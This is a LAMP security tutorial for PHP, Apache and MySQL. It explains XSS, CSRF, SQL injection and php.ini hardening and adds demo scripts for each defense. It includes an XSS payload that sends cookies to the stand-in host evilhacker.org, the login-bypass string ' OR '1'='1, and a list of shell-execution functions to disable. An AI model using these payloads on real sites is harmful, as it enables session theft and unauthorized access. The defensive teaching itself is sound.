LAMP Security Practices
XSS
Request Forgeries
SQL Injection
Disable PHP, Apache, OS information
Disable unnecessary modules
Log PHP errors
Disable/Limit file uploads
DoS attack
Remote Code execution
Disable dangerous PHP functions
Limit access to file system
XSS
A hacker posts the code snippet below in the comment
 section of the website http://exsite.com:
Hello Everyone!<script>document.write('<img src="http://evilhacker.org/?' + document.cookie + '">');</script>

Because the site inserts the comment into the page unmodified, the
 script runs whenever I open http://exsite.com: it adds an image whose
 URL carries my cookies, so my browser sends my cookie data to the
 hacker's site (http://evilhacker.org).
Note that the cookie data may contain my session (login)
 credentials, which you as a hacker can use to
XSS solution
All user-submitted content must be treated as untrusted.
 Stripping <, > and HTML tags from the input helps, but it is
 not sufficient on its own: a value placed inside an attribute,
 a URL or a script block can be abused without either character
Encode on output, for the context the value is written into: wrap
 every user-supplied value in htmlspecialchars($value, ENT_QUOTES, 'UTF-8')
 at the point where it is placed in the HTML
Set session.cookie_httponly = 1 in php.ini so that the session
 cookie is not readable from document.cookie even if a script does run
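The two rendering paths side by side, as an added example that is not code from the original slides: the comment payload from the XSS slide is rendered once the way the vulnerable site does it and once with output encoding. The function names, the author value and the session settings are assumptions made for this demo; htmlspecialchars() and session.cookie_httponly are the standard PHP facilities the slide text refers to.

```php
<?php
// Added example, not code from the original slides: rendering a user comment
// so the slide's payload is shown as text instead of executed. Function names,
// the author/comment values and the session settings are assumptions.

declare(strict_types=1);

// Constructed attacker input: the payload from the XSS slide.
const ATTACK_COMMENT = 'Hello Everyone!<script>document.write(\'<img src="http://evilhacker.org/?\' + document.cookie + \'">\');</script>';

/**
 * Encode a value for insertion into HTML text or a quoted attribute.
 * ENT_QUOTES encodes both ' and " so the result is safe inside attributes too;
 * ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string,
 * and the explicit charset stops multi-byte encoding tricks.
 */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Vulnerable rendering: user content is interpolated verbatim (the slide's bug). */
function renderCommentUnsafe(string $author, string $comment): string
{
    return "<div class=\"comment\"><b>$author</b>: $comment</div>";
}

/** Safe rendering: every user-controlled value is encoded at the point of output. */
function renderCommentSafe(string $author, string $comment): string
{
    return '<div class="comment"><b>' . h($author) . '</b>: ' . h($comment) . '</div>';
}

/**
 * Session cookie hardening: even if some script does run, it cannot read the
 * session id from document.cookie. Must be called before session_start().
 */
function startHardenedSession(): void
{
    ini_set('session.cookie_httponly', '1');   // cookie not exposed to JavaScript
    ini_set('session.use_strict_mode', '1');   // reject ids the server never issued
    ini_set('session.cookie_samesite', 'Lax'); // PHP >= 7.3; limits cross-site sends
    if (PHP_SAPI !== 'cli') {                  // no cookies to set on the command line
        session_start();
    }
}

/** Does the rendered HTML still contain a live <script> element? */
function containsLiveScript(string $html): bool
{
    return stripos($html, '<script') !== false;
}

startHardenedSession();
$unsafe = renderCommentUnsafe('mallory', ATTACK_COMMENT);
$safe   = renderCommentSafe('mallory', ATTACK_COMMENT);

echo "unsafe output contains a live script: ", containsLiveScript($unsafe) ? 'yes' : 'no', PHP_EOL;
echo "safe output contains a live script:   ", containsLiveScript($safe) ? 'yes' : 'no', PHP_EOL;
echo $safe, PHP_EOL;
```

Run it with php on the command line: the safe output prints the payload as &lt;script&gt;... text, which a browser displays literally instead of executing. Encoding at the output point rather than stripping on input also keeps the stored comment intact, so a later change of output context (JSON, a mail body) can apply its own encoding.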
Request Forgeries
Create, update and delete requests must be verified as having
 originated from your own application, because any other site the
 logged-in user visits can make the browser send them with the
 user's cookies (cross-site request forgery)
Ex. Don't use a URL like
 http://mysite.com/photos/delete/photo_id to
 delete a photo: an attacker's page can embed it in an <img> tag and
 the victim's browser will request it. Instead add a per-session
 secret (a signature) that is valid for a predefined time, and have
 the delete handler compare the submitted signature with the one in
 the session, rejecting the request if it is missing, different or
 older than the allowed window. Check the code below:
$_SESSION['signature'] = md5(uniqid(rand(), true) . $username); // one secret per login
$_SESSION['signature_timestamp'] = time();                       // for the expiry check
echo "<a href='http://mysite.com/photos/delete/photo_id?signature={$_SESSION['signature']}'>Delete</a>";

Note that rand() and uniqid() are predictable; on PHP 7 and later generate
 the secret with bin2hex(random_bytes(32)) instead, and send state-changing
 requests as POST rather than GET so they cannot be triggered by a plain link.
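A complete token cycle for the photo-delete action from the Request Forgeries slide, as an added example that is not code from the original slides: the token is issued into the session, embedded in a POST form, and checked (existence, expiry, constant-time comparison, single use) before anything is deleted. The function names, the 15-minute lifetime and the form markup are assumptions for this demo; it uses random_bytes() and hash_equals() (PHP >= 7.0) rather than the slide's md5(uniqid()) because rand() and uniqid() are predictable.

```php
<?php
// Added example, not code from the original slides: anti-CSRF token issue and
// verification for /photos/delete. Function names, the 900-second lifetime and
// the form markup are assumptions; a plain array stands in for $_SESSION so the
// script runs on the command line.

declare(strict_types=1);

const CSRF_TTL_SECONDS = 900; // token lifetime: 15 minutes (assumed)

/** Issue a fresh token and keep it (with its issue time) server-side in the session. */
function csrfIssueToken(array &$session): string
{
    $token = bin2hex(random_bytes(32));        // 256 bits from the CSPRNG
    $session['csrf_token'] = $token;
    $session['csrf_issued_at'] = time();
    return $token;
}

/**
 * Validate a submitted token against the session copy. True only if a token
 * was issued, it has not expired, and the submitted value matches; hash_equals
 * compares in constant time so the comparison leaks no timing information.
 */
function csrfVerifyToken(array &$session, ?string $submitted, ?int $now = null): bool
{
    $now = $now ?? time();
    if (empty($session['csrf_token']) || empty($session['csrf_issued_at'])) {
        return false;
    }
    if ($now - $session['csrf_issued_at'] > CSRF_TTL_SECONDS) {
        unset($session['csrf_token'], $session['csrf_issued_at']); // expired: discard
        return false;
    }
    if (!is_string($submitted) || !hash_equals($session['csrf_token'], $submitted)) {
        return false;
    }
    unset($session['csrf_token'], $session['csrf_issued_at']);     // single use
    return true;
}

/** The delete link becomes a POST form carrying the token, never a bare GET URL. */
function renderDeleteForm(array &$session, int $photoId): string
{
    $token = csrfIssueToken($session);
    return '<form method="post" action="/photos/delete">'
         . '<input type="hidden" name="photo_id" value="' . $photoId . '">'
         . '<input type="hidden" name="csrf_token" value="' . htmlspecialchars($token, ENT_QUOTES, 'UTF-8') . '">'
         . '<button type="submit">Delete</button></form>';
}

/** Handler for /photos/delete; method and POST data are passed in for testability. */
function handleDelete(array &$session, string $method, array $post): string
{
    if ($method !== 'POST') {
        return '405 method not allowed';          // GET must never change state
    }
    if (!csrfVerifyToken($session, $post['csrf_token'] ?? null)) {
        return '403 forbidden: missing, expired or wrong CSRF token';
    }
    $photoId = (int) ($post['photo_id'] ?? 0);
    return "200 deleted photo $photoId";          // real code would also check ownership
}

// Demonstration with a constructed session array standing in for $_SESSION.
$session = [];
$form  = renderDeleteForm($session, 42);
$token = $session['csrf_token'];

echo handleDelete($session, 'GET',  ['photo_id' => 42]), PHP_EOL;                          // GET request
echo handleDelete($session, 'POST', ['photo_id' => 42]), PHP_EOL;                          // no token
echo handleDelete($session, 'POST', ['photo_id' => 42, 'csrf_token' => 'guess']), PHP_EOL; // wrong token
echo handleDelete($session, 'POST', ['photo_id' => 42, 'csrf_token' => $token]), PHP_EOL;  // valid token
echo handleDelete($session, 'POST', ['photo_id' => 42, 'csrf_token' => $token]), PHP_EOL;  // replayed token
```

Only the fourth request succeeds: the GET, the missing token, the guessed token and the replay are all refused, and a wrong guess does not consume the real token, so the legitimate form still works afterwards. In a real application the session array is $_SESSION and the method and POST data come from $_SERVER['REQUEST_METHOD'] and $_POST.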
SQL Injection
Ex. Enter ' OR '1'='1 in the userid field of the login form. If the
 server script for authentication builds the query as
 "SELECT * FROM tblusers WHERE userid = '{$_GET['userid']}'", the
 string is interpolated to
 "SELECT * FROM tblusers WHERE userid = '' OR '1'='1'", whose WHERE
 clause is always true, so every row of tblusers is returned and the
 attacker is logged in without knowing any password.
SQL Injection Solution
Escape all user-supplied data before it goes into a query string, passing
 the connection so the escaping matches the connection's character set:
$userid = mysqli_real_escape_string($connection, $_GET['userid']);

Better, use prepared statements, which keep the SQL text and the data
 separate so the database never parses user input as SQL:
$statement = $connection->prepare("SELECT * FROM tblusers WHERE userid = ?");
$statement->bind_param("i", $_GET['userid']); // "i" casts to integer; use "s" for a string user id
$statement->execute();

Escaping protects only values inside quotes; it does nothing for unquoted
 numbers, table or column names or ORDER BY clauses, which is why prepared
 statements are the primary defence and escaping only a fallback.
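The slide's login query run both ways against a throwaway database, as an added example that is not code from the original slides, so the injection and the fix can be compared on real rows. It uses PDO with an in-memory SQLite database so it runs offline without MySQL (an assumption; the same two functions work unchanged on a PDO MySQL connection). The table name tblusers and the userid column come from the slide; the sample users and the password_hash column are constructed for the demo.

```php
<?php
// Added example, not code from the original slides: vulnerable and prepared
// versions of the slide's login query against a constructed SQLite database.
// Requires the pdo_sqlite extension (bundled with most PHP builds).

declare(strict_types=1);

/** Build an in-memory tblusers with two constructed sample users. */
function setupDatabase(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE tblusers (userid TEXT PRIMARY KEY, password_hash TEXT NOT NULL)');
    $stmt = $db->prepare('INSERT INTO tblusers (userid, password_hash) VALUES (?, ?)');
    foreach (['alice', 'bob'] as $user) {                 // constructed sample users
        $stmt->execute([$user, password_hash("$user-secret", PASSWORD_DEFAULT)]);
    }
    return $db;
}

/** Vulnerable: the slide's query with the user value interpolated into the SQL text. */
function findUserUnsafe(PDO $db, string $userid): array
{
    $sql = "SELECT * FROM tblusers WHERE userid = '$userid'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

/** Safe: the SQL text is fixed; the value travels separately as a bound parameter. */
function findUserSafe(PDO $db, string $userid): array
{
    $stmt = $db->prepare('SELECT * FROM tblusers WHERE userid = ?');
    $stmt->execute([$userid]);   // the engine never parses $userid as SQL
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db     = setupDatabase();
$attack = "' OR '1'='1";          // the slide's payload

// Normal use: both variants look up a real user.
printf("unsafe, alice:  %d row(s)\n", count(findUserUnsafe($db, 'alice')));
printf("safe,   alice:  %d row(s)\n", count(findUserSafe($db, 'alice')));

// Attack: the interpolated query becomes ... WHERE userid = '' OR '1'='1';
// the prepared statement looks for a user literally named ' OR '1'='1.
printf("unsafe, attack: %d row(s)\n", count(findUserUnsafe($db, $attack)));
printf("safe,   attack: %d row(s)\n", count(findUserSafe($db, $attack)));
```

For the normal lookup both functions return the single alice row. For the payload the interpolated query returns every user in the table (both sample rows), which is exactly the authentication bypass the slide describes, while the prepared statement returns no rows because no user has that literal name. A login routine should then verify the password with password_verify() against the returned hash rather than putting the password into the WHERE clause.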
Disable PHP information
Run the command:
curl -I http://mysite.com/
HTTP/1.1 200 OK
Date: Sat, 28 Apr 2012 09:48:55 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6

The X-Powered-By header shows that the site runs on PHP and
 reveals the exact PHP version, which lets an attacker look up
 known vulnerabilities for that release
Remove the header by setting expose_php = Off in php.ini
 and restarting Apache; re-run the curl command to confirm it is gone
Disable Server Information
Run the command:
curl -I http://mysite.com/
HTTP/1.1 200 OK
Date: Sat, 28 Apr 2012 09:48:55 GMT
Server: Apache/2.2.20 (Ubuntu)

The Server header reveals Apache, its exact version and the
 operating system (Ubuntu)
Reduce this information by setting
ServerSignature Off
ServerTokens Prod
in /etc/apache2/conf.d/security on Ubuntu with Apache 2.2 (with
 Apache 2.4 the file is /etc/apache2/conf-available/security.conf),
 or in httpd.conf on other distributions. ServerSignature Off removes
 the version footer from Apache-generated error pages; ServerTokens Prod
 reduces the header to "Server: Apache". Core Apache cannot drop the
 header entirely; that needs a module such as mod_security.
Disable unnecessary modules
Use php -m to list the enabled modules
Disable modules such as gd if the application does not need them;
 every loaded extension is attack surface
On Ubuntu, go to the folder /etc/php5/conf.d
Run: sudo mv gd.{ini,disable}
This renames gd.ini to gd.disable so the gd extension is no longer
 loaded. Restart Apache afterwards (sudo service apache2 restart) for
 the web server's PHP to pick up the change, and remember that php -m
 on the command line reports the CLI configuration: confirm with
 phpinfo() that the Apache SAPI sees the same module list.
Log PHP errors
Use the following to stop PHP error messages from being displayed
 to site users (they leak file paths, query fragments and library
 versions):
display_errors = Off

Use the following to write the PHP error messages to a log file instead:
log_errors = On
error_log = /var/log/httpd/php-error.log

The log file must be writable by the web server user and must not
 be under the document root. For real-time monitoring of the PHP
 error log use:
tail -f /var/log/httpd/php-error.log
Disable File Uploads
If your site does not need file upload functionality, turn it off
 in php.ini:
file_uploads = Off

If your site needs file uploads, keep them enabled but limit them to
 the minimum size required (post_max_size must be at least as large
 as upload_max_filesize, otherwise the upload is silently dropped):
file_uploads = On
upload_max_filesize = 1M
post_max_size = 2M
DoS attack
To stop a single script from running forever or consuming all
 memory and bringing down the server, cap every request with:
max_execution_time = 30
max_input_time = 30
memory_limit = 40M

These are per-request limits: they contain runaway scripts but do
 not protect against a flood of requests, which needs rate limiting
 in Apache or at the firewall.
Remote Code Execution
Remote URLs can be opened by PHP functions such as fopen,
 file_get_contents, include and require
When the path or URL passed to them comes from user input and is
 not validated carefully (e.g. include($_GET['page'])), this allows
 remote file inclusion, i.e. an attacker's script being fetched and
 executed on the server, as well as data leakage
To restrict remote file opening:
allow_url_fopen = Off
allow_url_include = Off

allow_url_include has been Off by default since PHP 5.2 and must stay
 off. allow_url_fopen = Off also blocks legitimate outbound fetches
 with file_get_contents(); if the application needs them, keep it On,
 leave allow_url_include Off, and never pass user input to include or
 require.
Disable Dangerous PHP functions
Use the following directive to disable PHP functions that are very
 powerful, dangerous and not normally required when PHP is running
 under a web server:
disable_functions = exec, passthru, shell_exec, system, proc_open, popen,
   curl_exec, curl_multi_exec, parse_ini_file, show_source

disable_functions can only be set in php.ini, not with ini_set() or
 .htaccess, so a compromised script cannot re-enable them. Check first
 that the application does not depend on any of them: disabling
 curl_exec, for example, breaks every cURL-based HTTP client.
Limit Access to File System
Use the following to restrict the files PHP can open to a set of
 directory trees:
open_basedir = "/var/www/html/"

With this setting PHP cannot read or write outside /var/www/html/,
 so a path traversal bug cannot reach /etc/passwd or /tmp. Separate
 several directories with a colon, and include the session and upload
 directories if they live elsewhere, otherwise session and upload
 handling is blocked by the same restriction:
open_basedir = "/var/www/html/:/var/lib/php/session/:/var/lib/php/upload/"
Session file path
Session files must be stored outside the web site folder, so that
 they can never be served as static files and a path traversal bug
 cannot read them. Use the following to change the session and
 upload temporary file locations:
session.save_path = "/var/lib/php/session"
upload_tmp_dir = "/var/lib/php/upload"

Both directories must exist, be writable by the web server user only
 (for example owner www-data, mode 0700) and not be shared with other
 sites or users on the same host.
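A script that checks the php.ini directives from the preceding slides against the recommended values, as an added example that is not code from the original slides. It reads the running interpreter's configuration with ini_get(), so it must be run under the SAPI you want to audit: php-cli reads a different php.ini from the Apache module, so either run `php -c /etc/php5/apache2/php.ini audit.php` or drop the file in the web root temporarily and open it in a browser. The expected values, the check modes and the file name audit.php are assumptions; the directives themselves are the slides'.

```php
<?php
// Added example, not code from the original slides: audit the hardening
// directives from the slides on the running PHP. Expected values and check
// modes are assumptions chosen to match the slides' recommendations.

declare(strict_types=1);

/** Directive => [expected value, how to compare]. */
function expectedSettings(): array
{
    return [
        'expose_php'              => ['0', 'bool'],
        'display_errors'          => ['0', 'bool'],
        'log_errors'              => ['1', 'bool'],
        'allow_url_fopen'         => ['0', 'bool'],
        'allow_url_include'       => ['0', 'bool'],
        'file_uploads'            => ['0', 'bool'],     // or On with a small upload_max_filesize
        'session.cookie_httponly' => ['1', 'bool'],
        'open_basedir'            => ['', 'nonempty'],
        'session.save_path'       => ['', 'nonempty'],
        'disable_functions'       => ['exec,passthru,shell_exec,system,proc_open,popen', 'contains_all'],
    ];
}

/** Normalise PHP's spellings of booleans ("On", "1", "true", "") to '0'/'1'. */
function iniBool(string $value): string
{
    return in_array(strtolower(trim($value)), ['1', 'on', 'true', 'yes'], true) ? '1' : '0';
}

/**
 * Compare one directive. Returns null when it matches the baseline, or a
 * human-readable finding otherwise. $actual is passed in so the function can
 * be exercised without touching the real interpreter configuration.
 */
function checkDirective(string $name, string $expected, string $mode, string $actual): ?string
{
    switch ($mode) {
        case 'bool':
            if (iniBool($actual) === $expected) {
                return null;
            }
            $shown = $actual === '' ? '(unset)' : $actual;
            return "$name is $shown, expected " . ($expected === '1' ? 'On' : 'Off');
        case 'nonempty':
            return trim($actual) !== '' ? null : "$name is not set";
        case 'contains_all':
            $have    = array_map('trim', explode(',', $actual));
            $missing = array_diff(explode(',', $expected), $have);
            return $missing ? "$name does not disable: " . implode(', ', $missing) : null;
    }
    return "unknown check mode $mode for $name";
}

/** Audit a map of directive => actual value; returns the list of findings. */
function auditSettings(array $actual): array
{
    $findings = [];
    foreach (expectedSettings() as $name => [$expected, $mode]) {
        $finding = checkDirective($name, $expected, $mode, $actual[$name] ?? '');
        if ($finding !== null) {
            $findings[] = $finding;
        }
    }
    return $findings;
}

/** Read the live value of every audited directive from the running PHP. */
function liveSettings(): array
{
    $live = [];
    foreach (array_keys(expectedSettings()) as $name) {
        $live[$name] = (string) ini_get($name);   // false (unknown directive) becomes ''
    }
    return $live;
}

$findings = auditSettings(liveSettings());
if ($findings === []) {
    echo "OK: all audited directives match the hardening baseline", PHP_EOL;
} else {
    echo "Findings (", PHP_SAPI, " SAPI):", PHP_EOL;
    foreach ($findings as $finding) {
        echo "  - ", $finding, PHP_EOL;
    }
}
```

On a stock installation the script reports several findings (expose_php and allow_url_fopen are On and open_basedir is unset by default); after applying the directives from the slides and restarting Apache it should print OK. Because checkDirective() takes the actual value as an argument, the same logic can be pointed at a parsed php.ini from a configuration management tool instead of the live interpreter.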
Write protect conf and application files
Use the chattr +i command to make a file immutable:
chattr +i /etc/php5/php.ini
chattr +i /etc/mysql/my.cnf
chattr +i /etc/apache2/apache2.conf
chattr -R +i /var/www/html/

An immutable file cannot be modified, deleted or renamed, even by
 root, until the flag is removed. Note that +i on a directory only
 freezes its list of entries, so use -R to cover the files inside it,
 and that root can still run chattr -i: this guards against accidental
 edits and automated tampering by a compromised web application, not
 against an attacker who already has root.
Use chattr -i to remove the write protection before editing a file
 or upgrading the package that owns it.